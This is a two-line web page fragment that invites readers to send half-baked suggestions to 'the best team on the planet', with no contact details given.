Have a half-baked suggestion? Contact:

The best team on the planet.